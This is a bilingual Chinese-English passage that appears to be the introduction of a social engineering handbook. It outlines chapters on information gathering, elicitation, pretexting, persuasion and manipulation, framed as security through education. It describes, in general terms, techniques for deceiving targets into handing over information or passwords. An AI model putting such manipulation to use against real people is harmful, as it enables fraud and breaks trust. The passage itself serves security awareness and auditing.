  • Are you a college student taking some form of IT specialization as your major?
  •  
     
  • 您现在是一名社会工程师,正在寻找新的和改进的想法来应用于您的实践吗?
  • Are you presently a social engineer looking for new and improved ideas to utilize in your practice?
  •  
     
  • 您是担心欺诈和身份盗窃危险的消费者吗?
  • Are you a consumer who fears the dangers of fraud and identity theft?
  •  
 

无论您遇到哪种情况,本书中包含的信息都将让您大开眼界,了解如何使用社交工程技能。您还将窥视社交工程的黑暗世界,了解“坏人”如何利用这些技能占上风。从那里,您将学习如何降低受到社交工程攻击的几率。

Regardless of which one of those situations fits you, the information contained within this book will open your eyes to how you can use social engineering skills. You will also peer into the dark world of social engineering and learn how the “bad guys” use these skills to gain an upper hand. From there, you learn how to become less vulnerable to social engineering attacks.

 

首先要提醒大家:这本书不适合弱者阅读。它将带你走进社会黑暗的角落,那里住着“黑帽”和恶意黑客。它揭示并深入研究了间谍和骗子使用的社会工程学领域。它回顾了看似从詹姆斯邦德电影中偷来的策略和工具。此外,它还涵盖了常见的日常情况,然后展示了它们是如何成为复杂的社会工程学场景的。最后,这本书揭示了专业社会工程师,甚至是专业罪犯的“内部”技巧和窍门。

One warning up front: This book is not for the weak. It takes you into those dark corners of society where the “black hats,” the malicious hackers, live. It uncovers and delves into areas of social engineering that are employed by spies and con men. It reviews tactics and tools that seem like they are stolen from a James Bond movie. In addition, it covers common, everyday situations and then shows how they are complex social engineering scenarios. In the end, the book uncovers the “insider” tips and tricks of professional social engineers and yes, even professional criminals.

 

有人问我为什么愿意透露这些信息。答案很简单:“坏人”不会因为合同限制或自己的道德而停止攻击。他们不会在一次失败后就停止攻击。恶意黑客不会因为公司不希望他们的服务器被入侵而消失。相反,社会工程、员工欺骗和互联网欺诈每天都在被越来越多地使用。当软件公司正在学习如何加强他们的程序时,黑客和恶意的社会工程师正在转向基础设施中最薄弱的部分——人。他们的动机完全是为了投资回报 (ROI);没有一个有自尊心的黑客会花 100 个小时来从一次只需一小时或更短时间的简单攻击中获得相同的结果。

Some have asked why I would be willing to reveal this information. The answer is simple: The “bad guys” don’t stop because of a contractual limitation or their own morals. They don’t cease after one failed attempt. Malicious hackers don’t go away because companies don’t like their servers to be infiltrated. Instead, social engineering, employee deception, and Internet fraud are used more and more each day. While software companies are learning how to strengthen their programs, hackers and malicious social engineers are turning to the weakest part of the infrastructure—the people. Their motivation is all about return on investment (ROI); no self-respecting hacker is going to spend 100 hours to get the same results from a simple attack that takes one hour, or less.

 

最终的悲哀结果是,没有办法保证 100% 的安全——除非你拔掉所有电子设备的插头,搬到山里去。因为这不太实际,也不太有趣,所以本书讨论了如何提高对外界攻击的认识和了解,然后概述了你可以用来防范这些攻击的方法。我的座右铭是“通过教育实现安全”。接受教育是抵御日益增加的社会工程和身份盗窃威胁的唯一可靠方法之一。领先的防病毒和保护软件提供商卡巴斯基实验室估计,2009 年有超过 100,000 个恶意软件样本通过社交网络传播。在最近的一份报告中,卡巴斯基估计“针对社交网络的攻击比其他类型的攻击成功 10 倍”。

The sad result in the end is that no way exists to be 100% secure—unless you unplug all electronic devices and move to the mountains. Because that isn’t too practical, nor is it a lot of fun, this book discusses ways to become more aware and educated about the attacks out there and then outlines methods that you can use to protect against them. My motto is “security through education.” Being educated is one of the only surefire ways to remain secure against the increasing threats of social engineering and identity theft. Kaspersky Labs, a leading provider of antivirus and protection software, estimated that more than 100,000 malware samples were spread through social networks in 2009. In a recent report, Kaspersky estimated that “attacks against social networks are 10 times more successful” than other types of attacks.

 

黑客的一句老话“知识就是力量”在这里确实适用。人们对每个消费者和企业可能面临的社会工程学危险和威胁的知识和理解越多,对每种攻击情景的分析越多,就越容易防范、缓解和阻止这些攻击。这就是所有这些知识的力量所在。

The old hacker adage, “knowledge is power” does apply here. The more knowledge and understanding one has of the dangers and threats of social engineering each consumer and business can have and the more each attack scenario is dissected, the easier it will be to protect from, mitigate, and stop these attacks. That is where the power of all this knowledge will come in.

 

为什么这本书如此有价值

Why This Book Is So Valuable

 

市场上有许多关于安全、黑客、渗透测试甚至社会工程学的书籍。这些书中的许多都提供了非常有价值的信息和技巧来帮助读者。即使有这么多信息,仍然需要一本书将社会工程学信息提升到一个新的水平,并详细描述这些攻击,从恶意的角度解释它们。这本书不仅仅是一本有趣的故事、巧妙的黑客或疯狂的想法的集合。这本书涵盖了世界上第一个社会工程学框架。它分析和剖析了成为一名优秀社会工程师的基础,并给出了如何使用这些技能来提高读者测试最大弱点——人类基础设施的能力的实用建议。

Many books are available on the market on security, hacking, penetration testing, and even social engineering. Many of these books have very valuable information and tips to help their readers. Even with all the information available, a book was needed that takes social engineering information to the next level and describes these attacks in detail, explaining them from the malicious side of the fence. This book is not merely a collection of cool stories, neat hacks, or wild ideas. This book covers the world’s first framework for social engineering. It analyzes and dissects the very foundation of what makes a good social engineer and gives practical advice on how to use these skills to enhance the readers’ abilities to test the biggest weakness—the human infrastructure.

 

布局

The Layout

 

本书提供了一种独特的社会工程学方法。其结构与www.social-engineer.org/framework上的深入社会工程学框架紧密相关。该框架概述了一个人要成为优秀的社会工程师应该努力掌握的技能和工具(身体、心理和个性)。

This book offers a unique approach to social engineering. It is structured closely to the in-depth social engineering framework found at www.social-engineer.org/framework. This framework outlines the skills and the tools (physical, mental, and personality) a person should strive to possess to be an excellent social engineer.

 

本书采用“讲述和展示”的方法,首先介绍某个主题背后的原理,然后定义、解释和分析,然后使用真实故事或案例研究的集合展示其应用。这不仅仅是一本关于故事或巧妙技巧的书,而是一本手册,一本穿越社会工程黑暗世界的指南。

This book takes a “tell and show approach” by first presenting a principle behind a topic then defining, explaining, and dissecting, then showing its application using collections of real stories or case studies. This is not merely a book about stories or neat tricks, but a handbook, a guide through the dark world of social engineering.

 

本书中有许多故事或帐户的互联网链接,以及所讨论主题的工具和其他方面的链接。书中随处可见实用练习,旨在帮助您不仅掌握社会工程框架,而且还掌握增强日常沟通的技能。

Throughout the book you can find many Internet links to stories or accounts as well as links to tools and other aspects of the topics discussed. Practical exercises appear throughout the book that are designed to help you master not only the social engineering framework but also the skills to enhance your daily communications.

 

如果您是安全专家,这些说法尤其正确。当您阅读本书时,我希望让您明白,安全不是一份“兼职”工作,也不是可以掉以轻心的事情。随着犯罪分子和恶意社会工程师似乎在这个世界上越来越坏,对企业和个人生活的攻击似乎变得更加激烈。自然,每个人都希望受到保护,个人保护软件和设备的销量增长就是明证。虽然这些项目很重要,但最好的保护是知识:通过教育获得安全。减少这些攻击影响的唯一真正方法是知道它们的存在,知道它们是如何进行的,并了解做这些事情的人的思维过程和心态。

These statements are especially true if you are a security specialist. As you read this book, I hope to impress upon you that security is not a “part-time” job and is not something to take lightly. As criminals and malicious social engineers seem to go from bad to worse in this world, attacks on businesses and personal lives seem to get more intense. Naturally, everyone wants to be protected, as evidenced by the increase in sales for personal protection software and devices. Although these items are important, the best protection is knowledge: security through education. The only true way to reduce the effect of these attacks is to know that they exist, to know how they are done, and to understand the thinking process and mentality of the people who would do such things.

 

当你掌握了这些知识,并了解了恶意黑客的想法时,你就会恍然大悟。这盏灯会照亮曾经黑暗的角落,让你清楚地看到潜伏在那里的“坏人”。当你能提前看到这些攻击的使用方式时,你就可以做好准备,让你的公司和个人事务免受攻击。

When you possess this knowledge and you understand how malicious hackers think, a light bulb goes off. That proverbial light will shine upon the once-darkened corners and enable you to clearly see the “bad guys” lurking there. When you can see the way these attacks are used ahead of time, you can prepare your company's and your personal affairs to ward them off.

 

当然,我并没有反驳我之前所说的话;我相信没有办法真正做到 100% 安全。即使是绝密、严密保护的秘密也可能以最简单的方式被黑客入侵。

Of course, I am not contradicting what I said earlier; I believe there is no way to truly be 100% secure. Even top-secret, highly guarded secrets can be and have been hacked in the simplest of manners.

 

请参阅www.social-engineer.org/resources/book/TopSecretStolen.htm上的存档故事,来自加拿大渥太华的一家报纸。这个故事非常有趣,因为有些文件落入了坏人之手。这些文件不是普通文件,而是绝密的国防文件,概述了特伦顿加拿大军事基地 (CFB) 安全围栏的位置、加拿大联合事件响应单位的平面图等信息。入侵是如何发生的?这些计划被扔进了垃圾桶,有人在垃圾箱里找到了它们。简单地翻找垃圾箱可能会导致该国最大的安全漏洞之一。

Look at the archived story at www.social-engineer.org/resources/book/TopSecretStolen.htm, from a newspaper in Ottawa, Canada. This story is very interesting, because some documents ended up in the wrong hands. These weren’t just any documents, but top-secret defense documents that outlined things such as locations of security fences at the Canadian Forces Base (CFB) in Trenton, the floor plan of the Canadian Joint Incident Response Unit, and more. How did the breach occur? The plans were thrown away, in the trashcan, and someone found them in the dumpster. A simple dumpster dive could have led to one of that country’s largest security breaches.

 

每天都会发生简单但致命的攻击,这表明人们需要接受教育;需要改变他们遵守密码政策的方式和处理远程访问服务器的方式;需要改变他们处理面试、送货和员工被雇用或解雇的方式。然而,没有教育,改变的动力就不存在。

Simple-yet-deadly attacks are launched every day and point to the fact that people need education; need to change the way they adhere to password policies and the way they handle remote access to servers; and need to change the way they handle interviews, deliveries, and employees who are hired or fired. Yet without education the motivation for change just isn’t there.

 

2003 年,计算机安全研究所与 FBI 联合进行了一项调查,发现 77% 的受访公司表示,员工不满是重大安全漏洞的根源。赛门铁克的数据丢失预防部门 Vontu ( http://go.symantec.com/vontu/ ) 表示,每 500 封电子邮件中就有 1 封包含机密数据。该报告的一些重点内容引自http://financialservices.house.gov/media/pdf/062403ja.pdf,如下:

In 2003 the Computer Security Institute did a survey along with the FBI and found that 77% of the companies interviewed stated a disgruntled employee as the source of a major security breach. Vontu, the data loss prevention section of Symantec (http://go.symantec.com/vontu/), says that 1 out of every 500 emails contains confidential data. Some of the highlights of that report, quoted from http://financialservices.house.gov/media/pdf/062403ja.pdf, are as follows:

 
 
     
  • 62% 的人报告了工作中发生的事件,这些事件可能会使客户数据面临身份盗窃的风险。
  • 62% reported incidents at work that could put customer data at risk for identity theft.
  •  
     
  • 66% 的受访者表示,对消费者隐私构成最大威胁的是他们的同事,而不是黑客。只有 10% 的受访者表示,黑客才是最大的威胁。
  • 66% say their co-workers, not hackers, pose the greatest risk to consumer privacy. Only 10% said hackers were the greatest threat.
  •  
     
  • 46% 的受访者表示,员工从公司数据库中删除敏感数据“很容易”甚至“极其容易”。
  • 46% say it would be “easy” to “extremely easy” for workers to remove sensitive data from the corporate database.
  •  
     
  • 32%(约三分之一)的人不知道公司内部保护客户数据的政策。
  • 32%, about one in three, are unaware of internal company policies to protect customer data.
  •  
 

这些是令人震惊和痛心的统计数据。

These are staggering and stomach-wrenching statistics.

 

后面的章节将更详细地讨论这些数字。这些数字表明安全处理方式本身存在严重缺陷。如果在发生违规行为之前进行教育,人们就可以做出改变,从而防止不必要的损失、痛苦和金钱损失。

Later chapters discuss these numbers in more detail. The numbers show a serious flaw in the way security itself is handled. When there is education, hopefully before a breach, then people can make changes that can prevent unwanted loss, pain, and monetary damage.

 

孙子说:“知己知彼,百战不殆。”这句话说得没错,但知己知彼只是成功的一半。智慧的定义是,将知识付诸行动,而不仅仅是知识本身。

Sun Tzu said, “If you know the enemy and know yourself you need not fear the results of a hundred battles.” How true those words are, but knowing is just half the battle. Action on knowledge is what defines wisdom, not just knowledge alone.

 

本书最适合用作社会攻击、社会操纵和社会工程领域的手册或指南。

This book is most effective used as a handbook or guide through the world of social attacks, social manipulation, and social engineering.

 

接下来是什么

What’s Coming Up

 

本书旨在涵盖专业和恶意社会工程师使用的所有方面、工具和技能。每章都深入探讨特定社会工程技能的科学和艺术,向您展示如何使用、增强和完善它。

This is book is designed to cover all aspects, tools, and skills used by professional and malicious social engineers. Each chapter delves deep into the science and art of a specific social engineering skill to show you how it can be used, enhanced, and perfected.

 

本章的下一节“社会工程学概述”将定义社会工程学及其在当今社会中扮演的角色,以及不同类型的社会工程学攻击,包括以非恶意方式使用社会工程学的其他生活领域。我还将讨论社会工程师如何使用社会工程学框架来规划审计或提高自己的技能。

The next section of this chapter, “Overview of Social Engineering,” defines social engineering and what roles it plays in society today, as well as the different types of social engineering attacks, including other areas of life where social engineering is used in a non-malicious way. I will also discuss how a social engineer can use the social engineering framework in planning an audit or enhancing his own skills.

 

第 2 章是课程的真正内容。信息收集是每项社会工程审计的基础。社会工程师的口头禅是:“我的能力取决于我所收集的信息。”社会工程师可以拥有世界上所有的技能,但如果他或她不了解目标,如果社会工程师没有概述每个细节,那么失败的可能性就更大。信息收集是每项社会工程活动的关键,尽管人际交往技巧和快速反应能力可以帮助您摆脱困境。通常情况下,您收集的信息越多,成功的机会就越大。

Chapter 2 is where the real meat of the lessons begins. Information gathering is the foundation of every social engineering audit. The social engineer’s mantra is, “I am only as good as the information I gather.” A social engineer can possess all the skills in the world, but if he or she doesn’t know about the target, if the social engineer hasn’t outlined every intimate detail, then the chance of failure is more likely to occur. Information gathering is the crux of every social engineering engagement, although people skills and the ability to think on your feet can help you get out of a sticky situation. More often than not, the more information you gather, the better your chances of success.

 

我将在该章中回答的问题包括:

The questions that I will answer in that chapter include the following:

 
 
     
  • 社会工程师可以使用哪些资源?
  • What sources can a social engineer use?
  •  
     
  • 什么信息是有用的?
  • What information is useful?
  •  
     
  • 社会工程师如何收集、汇总和组织这些信息?
  • How can a social engineer collect, gather, and organize this information?
  •  
     
  • 社会工程师应该具备哪些技术?
  • How technical should a social engineer get?
  •  
     
  • 多少信息才足够?
  • How much information is enough?
  •  
 

在分析了信息收集之后,第 2 章中讨论的下一个主题是通信建模。这个主题与信息收集密切相关。首先,我将讨论什么是通信建模以及它是如何作为一种实践开始的。然后,本章将介绍开发和使用适当通信模型所需的步骤。它概述了社会工程师如何针对目标使用此模型以及在每次参与中概述该模型的好处。

After the analyzation of information gathering, the next topic addressed in Chapter 2 is communication modeling. This topic closely ties in with information gathering. First I will discuss what communication modeling is and how it began as a practice. Then the chapter walks through the steps needed to develop and then use a proper communication model. It outlines how a social engineer uses this model against a target and the benefits in outlining it for every engagement.

 

第 3 章介绍了引诱,这是该框架的下一个逻辑步骤。它深入探讨了如何使用问题来获取信息、密码、对目标及其公司的深入了解。您将了解什么是好的和适当的引诱,并了解规划好引诱的重要性。

Chapter 3 covers elicitation, the next logical step in the framework. It offers a very in-depth look into how questions are used to gain information, passwords, in-depth knowledge of the target, and his or her company. You will learn what is good and proper elicitation and learn how important it is to have your elicitations planned out.

 

第 3 章还介绍了一个重要主题,即预先向目标的头脑中加载信息,以使您的问题更容易被接受。当您解开这一部分时,您将清楚地看到成为一名优秀的诱导者是多么重要。您还将清楚地看到如何不仅在安全实践中而且在日常生活中使用该技能。

Chapter 3 also covers the important topic of preloading the target’s mind with information to make your questions more readily accepted. As you unravel this section you will clearly see how important it is to become an excellent elicitor. You will also clearly see how you can use that skill not just in your security practices but in daily life.

 

第 4 章介绍了伪装,非常有说服力。这个沉重的话题是许多社会工程师的关键点之一。伪装涉及发展社会工程师在攻击公司时将扮演的角色。社会工程师是客户、供应商、技术支持、新员工,还是其他同样现实可信的角色?伪装不仅涉及构思故事情节,还涉及发展角色的外表、行为、说话、走路方式;决定他们拥有哪些工具和知识;然后掌握整个流程,这样当你接近目标时,你就是那个人,而不仅仅是扮演一个角色。涉及的问题包括:

Chapter 4, which covers pretexting, is powerful. This heavy topic is one of the critical points for many social engineers. Pretexting involves developing the role the social engineer will play for the attack on the company. Will the social engineer be a customer, vendor, tech support, new hire, or something equally realistic and believable? Pretexting involves not just coming up with the storyline but also developing the way your persona would look, act, talk, walk; deciding what tools and knowledge they would have; and then mastering the entire package so when you approach the target, you are that person, and not simply playing a character. The questions covered include the following:

 
 
     
  • 什么是借口?
  • What is pretexting?
  •  
     
  • 怎样找借口?
  • How do you develop a pretext?
  •  
     
  • 成功的借口有哪些原则?
  • What are the principles of a successful pretext?
  •  
     
  • 社会工程师如何策划并执行一个完美的借口?
  • How can a social engineer plan and then execute a perfect pretext?
  •  
 

框架的下一步可以写成好几卷。然而,必须从社会工程师的角度来讨论。第 5 章对一些非常具有对抗性的话题进行了毫无保留的讨论,包括眼神暗示。例如,一些专业人士对眼神暗示有何不同看法,社会工程师如何使用它们?本章还深入探讨了微表情这一令人着迷的科学及其对社会工程学的影响。

The next step in the framework is one that can fill volumes. Yet it must be discussed from the viewpoint of a social engineer. Chapter 5 is a no-holds-barred discussion on some very confrontational topics, including that of eye cues. For example, what are the varying opinions of some professionals about eye cues, and how can a social engineer use them? The chapter also delves into the fascinating science of microexpressions and its implications on social engineering.

 

第五章继续分析研究并回答以下问题:

Chapter 5 goes on analyzing the research, yielding answers to these questions:

 
 
     
  • 微表情能运用在安全领域吗?
  • Is it possible to use microexpressions in the field of security?
  •  
     
  • 你会怎样做?
  • How would you do so?
  •  
     
  • 微表情有什么好处?
  • What benefit are microexpressions?
  •  
     
  • 人们能否训练自己学会如何自动识别微表情?
  • Can people train themselves to learn how to pick up on microexpressions automatically?
  •  
     
  • 我们做完训练之后,通过微表情能够获取什么信息呢?
  • After we do the training, what information is obtained through microexpressions?
  •  
 

第 5 章中争论最多的主题之一可能是神经语言编程(NLP)。这场争论让许多人对它是什么以及如何使用它感到困惑。第 5 章简要介绍了 NLP 的历史以及 NLP 引起如此大争议的原因。您可以自行决定 NLP 是否可用于社会工程学。

Probably one of the most debated-on topics in Chapter 5 is neurolinguistic programming (NLP). The debate has many people undecided on what it is and how it can be used. Chapter 5 presents a brief history of NLP as well as what makes NLP such a controversy. You can decide for yourself whether NLP is usable in social engineering.

 

第 5 章还讨论了面对面或电话社交工程最重要的方面之一:知道如何提出好的问题、听取回答,然后提出更多问题。审讯和采访是执法部门多年来用来操纵罪犯认罪以及解决最棘手案件的两种方法。第 5 章的这一部分将您在第 3 章中获得的知识付诸实践。

Chapter 5 also discusses one of the most important aspects of social engineering in person or on the phone: knowing how to ask good questions, listen to responses, and then ask more questions. Interrogation and interviewing are two methods that law enforcement have used for years to manipulate criminals to confess as well as to solve the hardest cases. This part of Chapter 5 puts to practical use the knowledge you gained in Chapter 3.

 

此外,第 5 章讨论了如何建立即时融洽关系——这是一项可以在日常生活中使用的技能。本章最后介绍了我个人对“人类缓冲区溢出”的研究:人类思维与黑客每天利用的软件非常相似。通过应用某些原则,熟练的社会工程师可以溢出人类思维并注入他们想要的任何命令。

In addition, Chapter 5 discusses how to build instant rapport—a skill you can use in everyday life. The chapter ends by covering my own personal research into “the human buffer overflow”: the notion that the human mind is much like the software that hackers exploit every day. By applying certain principles, a skilled social engineer can overflow the human mind and inject any command they want.

 

就像黑客编写溢出来操纵软件执行代码一样,人类大脑可以接受某些指令,本质上是“溢出”目标并插入自定义指令。第 5 章是一堂令人大开眼界的课程,教你如何使用一些简单的技巧来掌握人们的思维方式。

Just like hackers write overflows to manipulate software to execute code, the human mind can be given certain instructions to, in essence, “overflow” the target and insert custom instructions. Chapter 5 is a mind-blowing lesson in how to use some simple techniques to master how people think.

 

许多人一生都在研究和证明什么能够影响人们。影响力是一种强大的工具,具有多面性。为此,第 6 章讨论了说服的基本原理。第 6 章中涉及的原则将引导您踏上成为说服大师的道路。

Many people have spent their lives researching and proving what can and does influence people. Influence is a powerful tool with many facets to it. To this end, Chapter 6 discusses the fundamentals of persuasion. The principles engaged in Chapter 6 will start you on the road toward becoming a master of persuasion.

 

本章简要讨论了现存的不同类型的说服,并提供了示例来帮助巩固如何在社会工程中使用这些方面。

The chapter presents a brief discussion of the different types of persuasion that exist and provides examples to help solidify how you can use these facets in social engineering.

 

讨论不止于此——框架也是当今的热门话题。关于如何使用框架,存在许多不同的观点,本书展示了一些现实生活中的例子。然后,我将逐一分析,带你了解从中学到的经验教训以及你可以做些什么来练习重新构建自己,以及作为一名社会工程师在日常生活中使用框架。

The discussion doesn’t stop there—framing is also a hot topic nowadays. Many different opinions exist on how one can use framing, and this book shows some real-life examples of it. Then dissecting each, I take you through the lessons learned and things you can do to practice reframing yourself as well as use framing in everyday life as a social engineer.

 

社会工程学中另一个压倒性的主题是操纵

Another overwhelming theme in social engineering is manipulation:

 
 
     
  • 它的用途是什么?
  • What is its purpose?
  •  
     
  • 什么样的激励因素会驱使操纵者?
  • What kinds of incentives drive manipulators?
  •  
     
  • 人们怎样才能将其用于社会工程学呢?
  • How can a person use it in social engineering?
  •  
 

第 6 章介绍了社会工程师需要了解的有关操纵的所有内容,以及如何成功应用这些技能。

Chapter 6 presents all a social engineer needs to know on the topic of manipulation, and how to successfully apply such skills.

 

第 7 章介绍了使社会工程审计更成功的工具。从隐藏式摄像头等物理工具到软件驱动的信息收集工具,每个部分都介绍了经过测试和尝试的社会工程工具。

Chapter 7 covers the tools that can make a social engineering audit more successful. From physical tools such as hidden cameras to software-driven information gathering tools, each section covers tested-and-tried tools for social engineers.

 

一旦你理解了社会工程学框架,第 8 章将讨论一些现实生活中的案例研究。我选择了世界著名社会工程师 Kevin Mitnick 的两个精彩案例。我分析、剖析,然后提出你可以从这些例子中学到什么,并从社会工程学框架中找出他使用的方法。此外,我还讨论了可以从他的攻击媒介中学到什么,以及如何在今天使用它们。我还讨论了一些个人账户并对其进行了剖析。

Once you understand the social engineering framework, Chapter 8 discusses some real-life case studies. I have chosen two excellent accounts from world-renowned social engineer Kevin Mitnick. I analyze, dissect, and then propose what you can learn from these examples and identify the methods he used from the social engineering framework. Moreover, I discuss what can be learned from his attack vectors as well as how they can be used today. I discuss some personal accounts and dissect them, as well.

 

如果不讨论一些可以缓解这些攻击的方法,那么社会工程学指南就不完整。附录提供了这些信息。我回答了一些关于缓解的常见问题,并提供了一些很好的提示,以帮助保护您和您的组织免受这些恶意攻击。

What social engineering guide would be complete without discussing some of the ways you can mitigate these attacks? The appendix provides this information. I answer some common questions on mitigation and give some excellent tips to help secure you and your organization against these malicious attacks.

 

前面的概述只是对即将发生的事情的初步了解。我真心希望您喜欢阅读这本书,就像我喜欢写这本书一样。我对社会工程学充满热情。我确实相信,某些特质,无论是后天习得的还是与生俱来的,都可以使一个人成为伟大的社会工程师。我也相信,只要有足够的时间和精力,任何人都可以学习社会工程学的不同方面,然后练习这些技能,成为一名熟练的社会工程师。

The preceding overview is just a taste of what is to come. I truly hope you enjoy reading this book as much as I have enjoyed writing it. Social engineering is a passion for me. I do believe there are certain traits, whether learned or inherent, that can make someone a great social engineer. I also subscribe to the belief that with enough time and energy anyone can learn the different aspects of social engineering and then practice these skills to become a proficient social engineer.

 

本书中的原则并不新鲜;你不会看到任何令人惊叹的技术来永远改变安全面貌。没有灵丹妙药。事实上,这些原则已经存在了很久。这本书所做的就是将所有这些技能集中在一个地方。它确实为你提供了如何练习这些技能的明确指导,以及实际使用它们的例子。所有这些信息都可以帮助您真正理解所讨论的主题。

The principles in this book are not new; there is no mind-blowing technology that you will see that will change the face of security forever. There are no magic pills. As a matter of fact, the principles have been around for as long as people have. What this book does do is combine all of these skills in one location. It does give you clear direction on how to practice these skills as well as examples of real-life situations where they are used. All of this information can help you gain a true sense of understanding the topics discussed.

 

最好的起点是从基础开始,回答一个基本问题:“什么是社会工程学?”

The best place to start is with the basics, by answering one fundamental question: “What is social engineering?”

 

社会工程学概述

Overview of Social Engineering

 

什么是社会工程学?

What is social engineering?

 

我曾经向一群安全爱好者问过这个问题,我对收到的答案感到震惊:

I once asked this question to a group of security enthusiasts and I was shocked at the answers I received:

 

“社会工程学就是通过欺骗人们来获取信息。”

 

“社会工程学就是成为一名优秀的演员。”

 

“社会工程学就是知道如何免费获得东西。”

 

“Social engineering is lying to people to get information.”

 

“Social engineering is being a good actor.”

 

“Social engineering is knowing how to get stuff for free.”

 
 

维基百科将其定义为“操纵他人采取行动或泄露机密信息的行为。虽然类似于骗局或简单的欺诈,但该术语通常适用于以信息收集、欺诈或计算机系统访问为目的的欺骗或欺诈;在大多数情况下,攻击者永远不会与受害者面对面。”

Wikipedia defines it as “the act of manipulating people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.”

 

尽管社会工程学因大量“免费披萨”、“免费咖啡”和“如何泡妞”等网站而声名狼藉,但实际上它已经触及日常生活的方方面面。

Although it has been given a bad name by the plethora of “free pizza,” “free coffee,” and “how to pick up chicks” sites, aspects of social engineering actually touch many parts of daily life.

 

韦氏词典将“社会”定义为“与社区中人类的生活、福利和关系有关”。它还将工程定义为“将物理或化学等纯科学知识应用于实际的艺术或科学,例如建造发动机、桥梁、建筑物、矿山、船舶和化工厂,或熟练或巧妙的装置;操纵。”

Webster’s Dictionary defines social as “of or pertaining to the life, welfare, and relations of human beings in a community.” It also defines engineering as “the art or science of making practical application of the knowledge of pure sciences, as physics or chemistry, as in the construction of engines, bridges, buildings, mines, ships, and chemical plants or skillful or artful contrivance; maneuvering.”

 

结合这两个定义,您可以轻松看到,社会工程学是一门艺术,或者更确切地说是一门科学,它巧妙地引导人类在生活的某些方面采取行动。

Combining those two definitions you can easily see that social engineering is the art or better yet, science, of skillfully maneuvering human beings to take action in some aspect of their lives.

 

这一定义拓宽了社会工程学的视野。社会工程学在日常生活中得到运用,比如孩子让父母屈服于他们的要求。它还用于教师与学生的互动,医生、律师或心理学家从患者或客户那里获取信息。它肯定也用于执法和约会——它确实用于从婴儿到政客以及介于两者之间的每个人之间的每一次人际交往中。

This definition broadens the horizons of social engineers everywhere. Social engineering is used in everyday life in the way children get their parents to give in to their demands. It is used in the way teachers interact with their students, in the way doctors, lawyers, or psychologists obtain information from their patients or clients. It is definitely used in law enforcement, and in dating—it is truly used in every human interaction from babies to politicians and everyone in between.

 

我想进一步阐述这个定义,即社会工程学的真正定义是操纵一个人采取可能符合可能不符合“目标”最佳利益的行动。这可能包括获取信息、获得访问权限或让目标采取某些行动。

I like to take that definition a step further and say that a true definition of social engineering is the act of manipulating a person to take an action that may or may not be in the “target’s” best interest. This may include obtaining information, gaining access, or getting the target to take certain action.

 

例如,医生、心理学家和治疗师经常使用我认为是社会工程学的元素来“操纵”他们的病人采取对他们有利的行动,而骗子则使用社会工程学的元素来说服他的目标采取导致他们损失的行动。尽管最终结果大不相同,但方法可能非常相似。心理学家可能会使用一系列精心设计的问题来帮助患者得出需要改变的结论。同样,骗子会使用精心设计的问题将他的目标置于脆弱的境地。

For example, doctors, psychologists, and therapists often use elements I consider social engineering to “manipulate” their patients to take actions that are good for them, whereas a con man uses elements of social engineering to convince his target to take actions that lead to loss for them. Even though the end game is much different, the approach may be very much the same. A psychologist may use a series of well-conceived questions to help a patient come to a conclusion that change is needed. Similarly, a con man will use well-crafted questions to move his target into a vulnerable position.

 

这两个例子都是社会工程学的真面目,但目标和结果却截然不同。社会工程学不仅仅是欺骗人们、撒谎或扮演角色。在与电视连续剧《虎队》中的著名社会工程师克里斯·尼克森的一次谈话中,他说:“真正的社会工程学不仅仅是相信你在扮演一个角色,而是在那一刻你就是那个人,你就是那个角色,这就是你的生活。”

Both of these examples are social engineering at its truest form, but have very different goals and results. Social engineering is not just about deceiving people or lying or acting a part. In a conversation I had with Chris Nickerson, a well-known social engineer from the TV series Tiger Team, he said, “True social engineering is not just believing you are playing a part, but for that moment you are that person, you are that role, it is what your life is.”

 

社会工程学并非只是一种行动,而是框架中提到的技能的集合,这些技能组合在一起,就构成了我所说的社会工程学的行动、技能和科学。同样,一顿美味的饭菜也并非只有一种配料,而是由多种配料的精心组合、混合和添加而成。这就是我想象中的社会工程学,而一名优秀的社会工程师就像一名大厨。加入一点诱导,加入一点操纵,再加上几把借口,砰! ——完美的社会工程师的美味大餐就出来了。

Social engineering is not just any one action but a collection of the skills mentioned in the framework that when put together make up the action, the skill, and the science I call social engineering. In the same way, a wonderful meal is not just one ingredient, but is made up by the careful combining, mixing, and adding of many ingredients. This is how I imagine social engineering to be, and a good social engineer is like a master chef. Put in a little dab of elicitation, add a shake of manipulation, and a few heaping handfuls of pretexting, and bam!—out comes a great meal of the perfect social engineer.

 

当然,本书讨论了其中的一些方面,但主要关注点在于你可以从执法人员、政客、心理学家甚至儿童身上学到什么,以提高你审计和保护自己的能力。分析孩子如何如此轻易地操纵父母,可以让社会工程人员洞察人类思维的运作方式。注意心理学家如何提出问题可以帮助了解什么能让人们感到安心。注意执法人员如何进行成功的审讯,可以清楚地了解如何从目标那里获取信息。了解政府和政客如何组织他们的信息以产生最大影响,可以显示什么有效,什么无效。分析演员如何进入角色可以让你大开眼界,了解令人惊奇的借口世界。通过剖析一些微表情和说服领域的领军人物的研究和工作,你可以了解如何在社会工程中使用这些技术。通过回顾世界上一些最伟大的销售人员和说服专家的激励因素,您可以学习如何建立融洽关系、让人们放心并达成交易。

Of course, this book discusses some of these facets, but the main focus is what you can learn from law enforcement, the politicians, the psychologists, and even children to better your abilities to audit and then secure yourself. Analyzing how a child can manipulate a parent so easily gives the social engineer insight into how the human mind works. Noticing how a psychologist phrases questions can help to see what puts people at ease. Noticing how a law enforcement agent performs a successful interrogation gives a clear path on how to obtain information from a target. Seeing how governments and politicians frame their messages for the greatest impact can show what works and what doesn’t. Analyzing how an actor gets into a role can open your eyes to the amazing world of pretexting. By dissecting the research and work of some of the leading minds in microexpressions and persuasion you can see how to use these techniques in social engineering. By reviewing some of the motivators of some of the world’s greatest salespeople and persuasion experts you can learn how to build rapport, put people at ease, and close deals.

 

然后,通过研究和分析这枚硬币的另一面——骗子、诈骗艺术家和小偷——你可以了解所有这些技能是如何结合在一起来影响人们并将人们引向他们认为永远不会去的方向的。

Then by researching and analyzing the flip side of this coin—the con men, scam artists, and thieves—you can learn how all of these skills come together to influence people and move people in directions they thought they would never go.

 

将这些知识与撬锁技巧、使用隐藏摄像机的间谍和专业信息收集人员的技能相结合,您就会拥有一位才华横溢的社会工程师。

Mix this knowledge with the skills of lock picks, spies who use hidden cameras, and professional information gatherers and you have a talented social engineer.

 

